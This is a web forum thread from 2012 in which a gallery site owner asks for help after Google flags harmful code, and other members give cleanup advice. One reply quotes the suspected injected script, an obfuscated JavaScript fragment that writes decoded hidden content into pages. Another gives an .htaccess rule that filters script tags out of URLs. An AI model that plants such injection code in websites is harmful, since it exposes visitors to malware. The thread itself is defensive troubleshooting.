Author Topic: Google Detected Harmful Code in my Gallery !! Help plz  (Read 11360 times)

0 Members and 1 Guest are viewing this topic.

Offline lordi

  • Newbie
  • *
  • Posts: 21
    • View Profile
Google Detected Harmful Code in my Gallery !! Help plz
« on: April 22, 2012, 04:18:14 PM »
Hello

I got a message from Google Webmasters Tools saying that Google detected a harmful code in my Gallery

I upgraded from 1.7.7 to 1.7.10 directly after I saw this message !!!

Well, I couldn't reach the path it gives me to remove the injection ... CAN ANYONE HELP ME PLZ ?????????????????????????


code removed @Rembrandt

what shall I do to remove the harmful code ???
« Last Edit: April 22, 2012, 04:43:17 PM by Rembrandt »

Rembrandt

  • Guest
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #1 on: April 22, 2012, 04:42:02 PM »
...what shall I do to remove the harmful code ???

1.) Do not longer login on your FTP or Web Interface
2.) Check with a Powerfull Antivirus Program your Home PC .
(There is very Important, the most Trojaner on the websites come from own PC per FTP.)
3.) If your Sytem clean change all your FTP and SQL passwords.
4.) Do not call your website
5.) Login on your FTP and remove the Code, check all your *.php and *html files on your FTP server.
6.) Have you all this done, call your website and check with the Online Antivirus Program your website.

Edit: it does not matter whether virus or trojan

mfg Andi
« Last Edit: May 31, 2013, 04:52:19 PM by Rembrandt »

Offline lordi

  • Newbie
  • *
  • Posts: 21
    • View Profile
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #2 on: April 22, 2012, 05:21:31 PM »
I did all what u said above

but, HOW DO I GET THE HARMFUL CODE OFF the FILES in the /gallery????????

knowing that I couldn't find the code in /categories.php

here's the Error Code and believe me it has nothing harmful here and no link for it::::: Just look at it and tell me what to do
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2


this is what I need help with
« Last Edit: April 22, 2012, 05:33:42 PM by lordi »

Rembrandt

  • Guest
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #3 on: April 22, 2012, 05:38:39 PM »
mean you, of where he comes the trojans ?

they have been looking into their categries.html ?

what for error code, this?
Quote
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2
this is not a error code



Offline lordi

  • Newbie
  • *
  • Posts: 21
    • View Profile
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #4 on: April 22, 2012, 11:50:59 PM »
the suspected injected code is the following

Quote
<script>function tRsEFox(bzrJSZR){ fff.op.replace("v");wind
ow.eval(); fff.op.replace("v"); }
var tOUU=document;document['wr1ite'.replace(/[0-9]/,'')](une
scape(document.getElementById('tIz').value));function rHHBLj
WHwe(KJndr){ window.eval();var vUklVhv = document.getElement
ById('YBI'); }
</script>

and it is injected in the following:

/gallery/categories.php?cat_id=2&sessionid=1371559e943a1dbd836f4b568bd70eb2


please help me

Offline sathishIPL

  • Jr. Member
  • **
  • Posts: 54
    • View Profile
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #5 on: April 23, 2012, 05:37:51 AM »
Hi,

It' seems the Javascript code is injected via your URL.

To avoid such harmful activities, add the following code in your .htaccess of your gallery.

It may help you in future.

# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
.

Br,
satz

Offline lordi

  • Newbie
  • *
  • Posts: 21
    • View Profile
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #6 on: April 23, 2012, 02:39:21 PM »
SathishIPL : thank you just added an htaccess and included the 2 lines u gave me

- Now, How do I remove the current <script> code ?? where do I find it specifically ????

Offline sathishIPL

  • Jr. Member
  • **
  • Posts: 54
    • View Profile
Re: Google Detected Harmful Code in my Gallery !! Help plz
« Reply #7 on: April 23, 2012, 04:39:01 PM »
Hi,

I am not sure, but try it  in templates/your templates/header.html    OR Footer.html  files .
 

But it will be .html files

br,
Satz